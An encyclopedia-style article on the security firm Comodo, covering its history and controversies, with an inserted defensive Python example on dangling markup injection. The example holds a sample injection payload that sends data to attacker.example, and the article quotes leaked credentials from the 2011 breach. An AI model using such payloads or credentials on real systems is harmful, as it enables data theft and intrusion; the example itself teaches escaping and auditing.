Comodo Group

Comodo Security Solutions, Inc.
Type: Private
Industry: Computer software
Founded: 1998, United Kingdom [1]
Founder: Melih Abdulhayoğlu
Headquarters: Clifton, New Jersey, United States
Area served: Worldwide
Key people: Melih Abdulhayoğlu (President and CEO)
Number of employees: 1,200+
Website: www.comodo.com

Comodo Security Solutions, Inc. is a cybersecurity company headquartered in Clifton, New Jersey in the United States.

History

The company was founded in 1998 in the United Kingdom [1] by Melih Abdulhayoğlu and relocated to the United States in 2004. Its products focus on computer and internet security. The firm operates a certificate authority that issues SSL certificates and offers information security products for both enterprises and consumers. [2] The company also helped set standards by contributing to the IETF (Internet Engineering Task Force) DNS Certification Authority Authorization (CAA) Resource Record. [3]

In October 2017, Francisco Partners acquired Comodo Certification Authority (Comodo CA) from Comodo Security Solutions, Inc. In November 2018, less than a year after the acquisition, Francisco Partners rebranded Comodo CA as Sectigo. [4] [5]

On June 28, 2018, the new organization announced that it was expanding from TLS/SSL certificates into IoT security with the announcement of its IoT device security platform. [6] The company announced its new headquarters in Roseland, New Jersey on July 3, 2018 [7] and its acquisition of CodeGuard, a website maintenance and disaster recovery company, on August 16, 2018. [8]

Companies

Industry affiliations

Comodo is a member of the following industry organizations:

Products

Controversies

Symantec

In response to Symantec's comment asserting that paid antivirus is superior to free antivirus, the CEO of Comodo Group challenged Symantec on 18 September 2010 to test whether paid or free products better defend the consumer against malware. [20] GCN's John Breeden saw the logic in Comodo's stance on free antivirus software and its challenge to Symantec: "This is actually a pretty smart move based on previous reviews of AV performance we've done in the GCN Lab. Our most recent AV review this year showed no functional difference between free and paid programs in terms of stopping viruses, and it's been that way for many years. In fact you have to go all the way back to 2006 to find an AV roundup where viruses were missed by some companies." [21]

Symantec responded that if Comodo was interested, it should have its product included in tests by independent reviewers. [22]

Comodo volunteered for an independent Symantec vs. Comodo review. [23] Though this showdown did not take place, Comodo has since been included in multiple independent reviews by AV-Test, [24] PC World, [25] Best Antivirus Reviews, [26] AV-Comparatives, [27] and PC Mag. [28]

Certificate hacking

On 23 March 2011, Comodo posted a report that eight days earlier, on 15 March 2011, a user account at an affiliate registration authority had been compromised and used to create a new user account that issued nine certificate signing requests. [29] Nine certificates for seven domains were issued. [29] The attack was traced to IP address 212.95.136.18, which originates in Tehran, Iran. [29] Though the firm initially reported that the breach was the result of a "state-driven attack", it subsequently stated that the apparent origin of the attack may have been the "result of an attacker attempting to lay a false trail". [29] [30]

The attack was immediately thwarted, with Comodo revoking all of the bogus certificates. Comodo also stated that it was actively looking into ways to improve the security of its affiliates. [31]

In an update on 31 March 2011, Comodo stated that it had detected and thwarted an intrusion into a reseller user account on 26 March 2011. The new controls implemented by Comodo following the incident of 15 March 2011 removed any risk of the fraudulent issuance of certificates. Comodo believed the attack came from the same perpetrator as the incident of 15 March 2011. [32]

In regards to this second incident, Comodo stated, "Our CA infrastructure was not compromised. Our keys in our HSMs were not compromised. No certificates have been fraudulently issued. The attempt to fraudulently access the certificate ordering platform to issue a certificate failed." [33]

On 26 March 2011, a person using the username "ComodoHacker" verified that they were the attacker by posting the private keys online [34] and posted a series of messages detailing how poor Comodo's security was and bragging about their abilities: [35] [36]

I hacked Comodo from InstantSSL.it, their CEO's e-mail address mfpenco@mfpenco.com

Their Comodo username/password was: user: gtadmin password: globaltrust

Their DB name was: globaltrust and instantsslcms

Enough said, huh? Yes, enough said, someone who should know already knows...

Anyway, at first I should mention we have no relation to Iranian Cyber Army, we don't change DNSes, we just hack and own.

I see Comodo CEO and other wrote that it was a managed attack, it was a planned attack, a group of cyber criminals did it, etc.

Let me explain:

a) I'm not a group, I'm single hacker with experience of 1000 hacker, I'm single programmer with experience of 1000 programmer, I'm single planner/project manager with experience of 1000 project managers, so you are right, it's managed by 1000 hackers, but it was only I with experience of 1000 hackers.

Such issues have been widely reported and have led to criticism of how certificates are issued and revoked. [37] [38] [39] [40] As of 2016, all of the certificates remained revoked. [29] Microsoft issued a security advisory and an update to address the issue at the time of the event. [41] [42]

Such attacks are not unique to Comodo – the specifics will vary from CA to CA, RA to RA, but there are so many of these entities, all of them trusted by default, that further holes are deemed to be inevitable. [43]

Association with PrivDog

In February 2015, Comodo was associated with a man-in-the-middle enabling tool known as PrivDog, which claims to protect users against malicious advertising. [44]

PrivDog issued a statement on 23 February 2015, saying, "A minor intermittent defect has been detected in a third party library used by the PrivDog standalone application which potentially affects a very small number of users. This potential issue is only present in PrivDog versions 3.0.96.0 and 3.0.97.0. The potential issue is not present in the PrivDog plug-in that is distributed with Comodo Browsers, and Comodo has not distributed this version to its users. There are potentially a maximum of 6,294 users in the USA and 57,568 users globally that this could potentially impact. The third party library used by PrivDog is not the same third party library used by Superfish. ... The potential issue has already been corrected. There will be an update tomorrow which will automatically update all 57,568 users of these specific PrivDog versions." [45]

Certificates issued to known malware

In 2009 Microsoft MVP Michael Burgess accused Comodo of issuing digital certificates to known malware. [46]

Comodo responded when notified and revoked the certificates that had been issued to the malware. [47]

Chromodo browser, ACL, no ASLR, VNC weak authentication

In January 2016, Tavis Ormandy reported that Comodo's Chromodo browser exhibited a number of vulnerabilities, including disabling of the same-origin policy. [48]

The vulnerability was not in the browser itself, which was based on the open-source code behind Google's Chrome browser, but in an add-on. As soon as Comodo became aware of the issue in early February 2016, the company released a statement and a fix: "As an industry, software in general is always being updated, patched, fixed, addressed, improved – it goes hand in hand with any development cycle...What is critical in software development is how companies address an issue if a certain vulnerability is found – ensuring it never puts the customer at risk." Those using Chromodo immediately received an update. [49] Comodo subsequently discontinued the Chromodo browser.

Ormandy noted that Comodo had received an "Excellence in Information Security Testing" award from Verizon despite the vulnerability in its browser, despite shipping its VNC component with weak authentication by default, despite not enabling address space layout randomization (ASLR), and despite its use of access control lists (ACLs) throughout its product. In Ormandy's view, Verizon's certification methodology was at fault. [50]

Let's Encrypt trademark registration application

In October 2015, Comodo applied for the trademarks "Let's Encrypt", "Comodo Let's Encrypt", and "Let's Encrypt with Comodo". [51] [52] [53] These trademark applications were filed almost a year after the Internet Security Research Group, parent organization of Let's Encrypt, started using the name Let's Encrypt publicly in November 2014, [54] and despite the fact that Comodo's "intent to use" trademark filings acknowledged that it had never used "Let's Encrypt" as a brand.

On 24 June 2016, Comodo publicly posted in its forum that it had filed for "express abandonment" of its trademark applications. [55]

Comodo's Chief Technical Officer Robin Alden said, "Comodo has filed for express abandonment of the trademark applications at this time instead of waiting and allowing them to lapse. Following collaboration between Let's Encrypt and Comodo, the trademark issue is now resolved and behind us, and we'd like to thank the Let's Encrypt team for helping to bring it to a resolution." [56]

Dangling markup injection vulnerability

On 25 July 2016, Matthew Bryant showed that Comodo's website was vulnerable to dangling markup injection attacks. The flaw could be used to make Comodo's servers send emails to a domain's system administrators approving a wildcard certificate request, and thereby to obtain arbitrary wildcard certificates via Comodo's 30-Day PositiveSSL product. [57]

Bryant reported the issue in June 2016, and on 25 July 2016, Comodo's Chief Technical Officer Robin Alden confirmed that a fix had been put in place, within the responsible-disclosure period customary in the industry. [58]
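As an added example of the defensive side of the issue described above (this is not Comodo's code), the following shows an HTML approval e-mail template that first inserts attacker-controlled request fields verbatim and then escapes them for their context, with a small audit that flags an unterminated tag in the rendered document before it is sent. The field names, template, host names and token are constructed placeholders.

```python
"""Dangling markup injection relies on an attacker-supplied string (here a
field copied from a certificate request) being pasted into HTML with an
unterminated tag or attribute, so that the text following it, including any
approval link, becomes part of the attacker's element. Escaping each value
for its HTML context closes that door; an audit of the rendered document
catches cases where the escaping was missed."""
import html
import re

# Constructed sample request: the organisation field carries an
# unterminated <img> tag with an open single-quoted attribute.
UNTRUSTED_REQUEST = {
    "domain": "example.com",
    "org": "Example Ltd <img src='https://attacker.example/collect?",
}
APPROVAL_LINK = "https://ca.example/approve?token=PLACEHOLDER_TOKEN"  # placeholder

TEMPLATE = (
    "<html><body>"
    "<p>A certificate for <b>{domain}</b> was requested by {org}.</p>"
    '<p><a href="{link}">Approve this request</a></p>'
    "</body></html>"
)

# Tags the template itself is allowed to contain.
ALLOWED_TAGS = frozenset({"html", "body", "p", "b", "a"})
# A complete tag: '<', optional '/', a name, attributes, then '>' with no
# intervening '<'. Anything starting with '<' that does not match is dangling.
TAG_RE = re.compile(r"<(/?)([A-Za-z][A-Za-z0-9]*)([^<>]*)>")


def render_vulnerable(req, link):
    """The pattern behind the bug: untrusted fields inserted verbatim."""
    return TEMPLATE.format(domain=req["domain"], org=req["org"], link=link)


def render_hardened(req, link):
    """Escape every interpolated value for its HTML context.

    quote=True also encodes ' and ", so a value cannot open or close an
    attribute. This is sufficient only because the template places each
    value in element text or a quoted attribute; unquoted attributes or
    script/style contexts would need different encoding.
    """
    return TEMPLATE.format(
        domain=html.escape(req["domain"], quote=True),
        org=html.escape(req["org"], quote=True),
        link=html.escape(link, quote=True),
    )


def audit(doc, allowed=ALLOWED_TAGS):
    """Return a list of problems in a rendered document: any '<' that does
    not begin a well-formed tag, and any tag outside the allowed set.
    An empty list means the document is safe to send."""
    problems = []
    pos = 0
    while (i := doc.find("<", pos)) >= 0:
        m = TAG_RE.match(doc, i)
        if m is None:
            problems.append(f"dangling '<' at offset {i}: {doc[i:i + 40]!r}")
            pos = i + 1
            continue
        if m.group(2).lower() not in allowed:
            problems.append(f"unexpected tag <{m.group(2)}>")
        pos = m.end()
    return problems


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(name, audit(render(UNTRUSTED_REQUEST, APPROVAL_LINK)))
```

The vulnerable rendering is reported as dangling at the injected `<img`, while the hardened rendering passes the audit because the injected markup survives only as inert `&lt;img src=&#x27;...` text.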


References

  1. "How US entrepreneur's global internet security firm started life in Bradford". Telegraph & Argus. 3 September 2014. Retrieved 3 September 2014.
  2. "Comodo Company Overview". Retrieved 14 August 2015.
  3. "DNS Certification Authority Authorization – Comodo". Retrieved 14 January 2013.
  4. "Comodo Sells Certificate Business to Private Equity Firm | SecurityWeek.Com". www.securityweek.com. Retrieved 29 October 2019.
  5. Murphy, Ian (2 November 2018). "Comodo CA becomes Sectigo and expands to cover IoT". Enterprise Times. Retrieved 21 November 2019.
  6. "Comodo CA launches IoT security platform". BetaNews. 28 June 2018. Retrieved 29 October 2019.
  7. Perry, Jessica (3 July 2018). "Comodo CA global HQ coming to Roseland". NJBIZ. Retrieved 29 October 2019.
  8. Novinson, Michael (16 August 2018). "Comodo CA Buys Website Disaster Recovery Startup CodeGuard". CRN. Retrieved 29 October 2019.
  9. "Comodo – Contact Us".
  10. Nohe, Patrick (1 November 2018). "Comodo CA changes its name to Sectigo".
  11. "Comodo CA Rebrands as Sectigo". 1 November 2018.
  12. "Comodo Security Solutions, Inc". Icsalabs.com. Retrieved 30 March 2015.
  13. Joe Callan. "Domainers Magazine – DNS.com : The Next Geo-Targeting Solution – Jul–Aug (Issue 22)". Domainersmagazine.com. Archived from the original on 12 April 2015. Retrieved 30 March 2015.
  14. Ellen Messmer (14 February 2013). "Multivendor power council formed to address digital certificate issues". Network World. Archived from the original on 28 July 2013.
  15. "Authentication Security News, Analysis, Discussion, & Community". Darkreading.com. Archived from the original on 10 April 2013. Retrieved 30 March 2015.
  16. "SecurityPark". Archived from the original on 2 April 2015. Retrieved 30 March 2015.
  17. "CA/Browser Forum". Cabforum.org. Retrieved 23 April 2013.
  18. Wilson, Wilson. "CA/Browser Forum History" (PDF). DigiCert. Retrieved 23 April 2013.
  19. "Industry Round Table May 17th 2005 – New York" (PDF). Retrieved 17 May 2005.
  20. Abdulhayoğlu, Melih (18 September 2010). "Challenge to Symantec from Comodo CEO". Comodo Group. Retrieved 22 September 2010.
  21. John Breeden II. "Is free virus protection inferior?". gcn.com. Retrieved 23 December 2016.
  22. Rubenking, Neil J. (22 September 2010). "Comodo Challenges Symantec to Antivirus Showdown". PC Magazine. Ziff Davis, Inc. Retrieved 22 September 2010.
  23. "Challenge to Symantec from Comodo CEO!". Retrieved 23 December 2016.
  24. Ms. Smith. "AV-test Lab tests 16 Linux antivirus products against Windows and Linux malware". www.networkworld.com. Retrieved 23 December 2016.
  25. Erik Larkin (24 August 2009). "Comodo Internet Security Free Antivirus Software". www.pcworld.com. Retrieved 23 December 2016.
  26. Daniele P. "Comodo 2016 Review: Malware Protection & Online Security". www.bestantivirus.com. Retrieved 23 December 2016.
  27. "Independent Tests of Anti-Virus Software". www.av-comparatives.org. Retrieved 23 December 2016.
  28. Neil P. Rubenking. "The Best Free Antivirus Protection of 2016". www.pcmag.com. Retrieved 23 December 2016.
  29. "Report of incident on 15-MAR-2011: Update 31-MAR-2011". Comodo Group. Retrieved 24 March 2011.
  30. Hallam-Baker, Phillip (23 March 2011). "The Recent RA Compromise". Comodo Blog. Retrieved 24 March 2011.
  31. "Iran accused in 'dire' net security attack". BBC News. 24 March 2011. Retrieved 23 December 2016.
  32. "Update 31-MAR-2011". Retrieved 23 December 2016.
  33. "Update 31-Mar-2011". Retrieved 23 December 2016.
  34. "Verifying the Comodo Hacker's key".
  35. Bright, Peter (28 March 2011). "Independent Iranian Hacker Claims Responsibility for Comodo Hack". Wired. Retrieved 29 March 2011.
  36. "ComodoHacker's Pastebin". Pastebin.com. 5 March 2011. Retrieved 30 March 2015.
  37. Eckersley, Peter (23 March 2011). "Iranian hackers obtain fraudulent HTTPS certificates: How close to a Web security meltdown did we get?". EFF. Retrieved 24 March 2011.
  38. "Iran accused in 'dire' net security attack". BBC News. 24 March 2011. Retrieved 24 March 2011.
  39. "Detecting Certificate Authority compromises and web browser collusion". TOR. 22 March 2011. Retrieved 24 March 2011.
  40. Elinor Mills and Declan McCullagh (23 March 2011). "Google, Yahoo, Skype targeted in attack linked to Iran". CNET. Retrieved 24 March 2011.
  41. "Microsoft Security Advisory (2524375)". Microsoft. 23 March 2011. Retrieved 24 March 2011.
  42. "Microsoft Security Advisory: Fraudulent Digital Certificates could allow spoofing". Microsoft. 23 March 2011. Retrieved 24 March 2011.
  43. "Independent Iranian Hacker Claims Responsibility for Comodo Hack". Retrieved 23 December 2016.
  44. "PrivDog Security Advisory (Threat level: LOW)". http://www.pcworld.com/article/2887632/secure-advertising-tool-privdog-compromises-https-security.html. Retrieved 30 December 2016.
  45. "PrivDog Security Advisory (Threat level: LOW)". Retrieved 23 December 2016.
  46. "Comodo continue to to[sic] issue certificates to known Malware - May 2009 - Forums".
  47. "Microsoft MVP Mike Burgess Responds To Comodo's CEO On Comodo Certificates Issued To Malware Distributors". Retrieved 23 December 2016.
  48. "Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security". https://code.google.com/p/google-security-research/issues/detail?id=704.
  49. "Comodo will fix major flaw in knock-off Chrome browser". 4 February 2016. Retrieved 23 December 2016.
  50. "Why Antivirus Standards of Certification Need to Change". Tripwire. 23 March 2016.
  51. "Trademark Status & Document Retrieval". tsdr.uspto.gov. Retrieved 23 June 2016.
  52. "Trademark Status & Document Retrieval". tsdr.uspto.gov. Retrieved 23 June 2016.
  53. "Trademark Status & Document Retrieval". tsdr.uspto.gov. Retrieved 23 June 2016.
  54. Tsidulko, Joseph (19 November 2014). "Let's Encrypt, A Free And Automated Certificate Authority, Comes Out Of Stealth Mode". CRN. Retrieved 23 June 2016.
  55. "Topic: Trademark registration". Retrieved 24 June 2016.
  56. "Comodo Stands Down From Trademark Tussle with Let's Encrypt". 27 June 2016. Retrieved 23 December 2016.
  57. "Keeping Positive – Obtaining Arbitrary Wildcard SSL Certificates from Comodo via Dangling Markup Injection". thehackerblog.com. Retrieved 29 July 2016.
  58. "Keeping Positive – Obtaining Arbitrary Wildcard SSL Certificates from Comodo via Dangling Markup Injection". Retrieved 23 December 2016.